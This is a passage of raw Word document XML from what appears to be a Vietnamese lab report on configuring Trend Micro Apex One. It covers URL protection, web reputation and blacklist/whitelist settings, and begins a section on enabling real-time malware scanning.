          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Product) là Apex One </w:t>
      </w:r>
      <w:r w:rsidR="300FF29B" w:rsidRPr="300FF29B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Agent</w:t>
      </w:r>
      <w:r w:rsidR="00777654">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0EF30" w14:textId="36830C77" w:rsidR="171A7B4A" w:rsidRDefault="641F3DBB" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F5650A" wp14:editId="310A8622">
            <wp:extent cx="6048375" cy="1965722"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="15875"/>
            <wp:docPr id="604663220" name="Picture 60466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48375" cy="1965722"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E9934" w14:textId="22FA189F" w:rsidR="110663BA" w:rsidRDefault="110663BA" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tìm mục "URL Protection" hoặc "Web Reputation": Mục này thường có thể được tìm thấy trong phần quản lý cấu hình hay cài đặt bảo mật của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B79213" w14:textId="1F09FA72" w:rsidR="738D86E8" w:rsidRDefault="641F3DBB" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FBC996C" wp14:editId="726D0C6E">
            <wp:extent cx="6010275" cy="2892445"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="22225"/>
            <wp:docPr id="1370247022" name="Picture 137024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0275" cy="2892445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA1FAA" w14:textId="5A65ED2D" w:rsidR="355C7B6C" w:rsidRDefault="355C7B6C" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác định các cài đặt chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F190D96" w14:textId="70A75090" w:rsidR="355C7B6C" w:rsidRDefault="355C7B6C" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Danh sách Đen (Blacklist): Quản lý và cấu hình danh sách các trang web bị cấm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C885C" w14:textId="7F21669E" w:rsidR="355C7B6C" w:rsidRDefault="355C7B6C" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Danh sách Trắng (Whitelist): Quản lý và cấu hình danh sách các trang web được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322A2AE" w14:textId="0DDAD7B4" w:rsidR="355C7B6C" w:rsidRDefault="355C7B6C" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phân tích Hành vi Trang web: Kích hoạt hoặc tắt tính năng phân tích hành vi để đánh giá mức độ rủi ro của các trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE99B6" w14:textId="37CA7FCF" w:rsidR="187C04C9" w:rsidRDefault="641F3DBB" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C25703" wp14:editId="6770EE26">
            <wp:extent cx="5886450" cy="2820591"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="18415"/>
            <wp:docPr id="1841769860" name="Picture 184176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6450" cy="2820591"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12068715" w14:textId="61065AA9" w:rsidR="110663BA" w:rsidRDefault="37BDAF7D" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cấu hình các quy tắc và hành vi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F166ED" w14:textId="4B701FC6" w:rsidR="110663BA" w:rsidRDefault="37BDAF7D" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chặn hoặc Cảnh báo: Chọn xem bạn muốn chặn truy cập hoặc chỉ cảnh báo về các trang web độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F8647" w14:textId="66EFFEBA" w:rsidR="110663BA" w:rsidRDefault="37BDAF7D" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kiểm soát Thời gian: Nếu cần, bạn có thể cấu hình để kiểm soát thời gian truy cập vào các loại trang web cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615547F9" w14:textId="71CE9C63" w:rsidR="0E154D7E" w:rsidRDefault="1111786E" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="214E6BDF" wp14:editId="71DDDCEA">
            <wp:extent cx="5738190" cy="2749550"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="12700"/>
            <wp:docPr id="1644199696" name="Picture 164419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0685" cy="2755537"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D2049" w14:textId="3E0380E4" w:rsidR="641F3DBB" w:rsidRDefault="641F3DBB" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="641F3DBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lưu và Áp dụng các thay đổi: Sau khi bạn đã cấu hình các thiết lập theo mong muốn, đừng quên lưu và áp dụng để các thay đổi có hiệu lực.Lưu ý sau khi tiến hành Lưu và Áp dụng trên Web, các Admin cần update cho các agent </w:t>
      </w:r>
      <w:r w:rsidR="21253E58" w:rsidRPr="21253E58">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">để có thể áp dụng thành công </w:t>
      </w:r>
      <w:r w:rsidR="34FBF4A3" w:rsidRPr="34FBF4A3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>những chính sách mới cho agent của mình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE1D60" w14:textId="16C73B85" w:rsidR="3543A34F" w:rsidRPr="00777654" w:rsidRDefault="0257EF92" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kiểm tra và Theo dõi: Thực hiện kiểm tra và theo dõi để đảm bảo rằng URL protection hoạt động đúng cách. Theo dõi các báo cáo và cảnh báo từ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175CC6BB" w14:textId="09D0BF6C" w:rsidR="005F62F4" w:rsidRPr="005F62F4" w:rsidRDefault="004E57E9" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc152795842"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Phát hiện và ngăn chặn malware</w:t>
      </w:r>
      <w:r w:rsidR="00184129">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – có sẵn trên thiết bị EndPoint</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="59B82C15" w14:textId="387394B2" w:rsidR="00AF6A21" w:rsidRPr="005F62F4" w:rsidRDefault="00213714" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apex One có khả năng</w:t>
      </w:r>
      <w:r w:rsidR="002208AB" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855318" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002208AB" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00855318" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware</w:t>
      </w:r>
      <w:r w:rsidR="0083046C" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="0041787A" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scan floppy disk</w:t>
      </w:r>
      <w:r w:rsidR="00BB0787" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Scan tất cả folder, scan</w:t>
      </w:r>
      <w:r w:rsidR="0065157E" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> usb</w:t>
      </w:r>
      <w:r w:rsidR="00AE1893" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40D648" w14:textId="442DA0C0" w:rsidR="008C3EF8" w:rsidRPr="005F62F4" w:rsidRDefault="00AE1A81" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài ra </w:t>
      </w:r>
      <w:r w:rsidR="002C07A0" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">đối với những cuộc tấn công không có trong signature </w:t>
      </w:r>
      <w:r w:rsidR="00A73366" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apex one sẽ sử dụng những kỹ thuật bao gồm machine learning, phân tích hành vi, variant protection, census check, application control (kiểm soát ứng dụng), exploit prevention (chống khai thác) &amp; good file check cùng với các kỹ thuật khác như file reputation, web reputation &amp; C&amp;C blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C00460" w14:textId="5AB9D3A6" w:rsidR="0098555E" w:rsidRPr="005F62F4" w:rsidRDefault="00A511A2" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Để thực hiện thử nghiệm này, nhóm chia </w:t>
      </w:r>
      <w:r w:rsidR="00143476" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>làm 2 phần là</w:t>
      </w:r>
      <w:r w:rsidR="00EC0BD1" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> phát hiện những malware đã có sẵn trên máy và </w:t>
      </w:r>
      <w:r w:rsidR="004A7942" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tấn công bằng malware</w:t>
      </w:r>
      <w:r w:rsidR="0098555E" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16FCA8" w14:textId="0B656E16" w:rsidR="00911809" w:rsidRPr="0004418A" w:rsidRDefault="00860A98" w:rsidP="0004418A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cách thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375A5E9" w14:textId="1599FF8E" w:rsidR="00E3702B" w:rsidRPr="005F62F4" w:rsidRDefault="005D6A37" w:rsidP="0004418A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào </w:t>
      </w:r>
      <w:r w:rsidR="0083658B" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>polic</w:t>
      </w:r>
      <w:r w:rsidR="00D87376" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="008178CD" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D7AE3" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A326B9" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E24E9C" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D7AE3" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidR="0012508C" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A01CA" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00A326B9" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0012508C" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Anti</w:t>
      </w:r>
      <w:r w:rsidR="008A01CA" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-malware scans</w:t>
      </w:r>
      <w:r w:rsidR="00A326B9" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Real-time Scan</w:t>
      </w:r>
      <w:r w:rsidR="00ED6523" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D32D44" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> click vào </w:t>
      </w:r>
      <w:r w:rsidR="006C2E32" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ô </w:t>
      </w:r>
      <w:r w:rsidR="00D33F31" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enable virus/malware scan</w:t>
      </w:r>
      <w:r w:rsidR="00EE4F53" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và Enable spyware/grayware scan</w:t>
      </w:r>
      <w:r w:rsidR="005030D2" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590E00AE" w14:textId="76F7E456" w:rsidR="0001348C" w:rsidRPr="005F62F4" w:rsidRDefault="00A326B9" w:rsidP="00777654">
